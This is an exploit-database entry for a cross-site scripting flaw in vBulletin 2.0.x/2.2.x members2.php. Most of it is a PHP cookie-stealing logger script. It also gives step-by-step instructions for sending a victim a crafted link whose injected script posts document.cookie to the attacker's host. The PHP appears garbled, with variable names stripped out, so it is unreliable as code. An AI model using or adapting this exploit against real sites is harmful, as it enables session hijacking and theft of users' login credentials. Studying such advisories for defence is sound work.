Vulners
Lucene search
VBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability
source: http://www.securityfocus.com/bid/6246/info
Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use cookie-based authentication credentials to hijack the session of the legitimate user.
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC ([email protected]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
= "Cookies.Log";
// Functions:
/*
If (['Action'] = "Log") {
= "<!--";
= "--->";
}
Else {
= "";
= "";
}
Print ();
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:[email protected]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ();
*/
Switch (['Action']) {
Case "Log":
= ['Cookie'];
= StrStr (, SubStr (, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
= FOpen (, "a+");
FWrite (, Trim () . "\n");
FClose ();
Print ("<Meta HTTP-Equiv=\"Refresh\"
Content=\"0; URL=" . ['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists () || !In_Array ()) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
= Array_UniQue (File ());
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("^ Logged Records : <B>" . Count (File
()) . "</B>\n");
Print ("^ Listed Records : <B>" . Count
() . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ()) > 0) {
['Download'] = "[<A Href=\"" .
. "\">Download</A>]";
}
Else{
['Download'] = "[No Records in Log]";
}
Print ("^ Download Log : " .
['Download'] . "\n");
Print ("^ Clear Records : [<A Href=\"" .
. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ([0], [1]) = Each ()) {
Print ("<B>" . [0] . ": </B>" . [1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ();
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1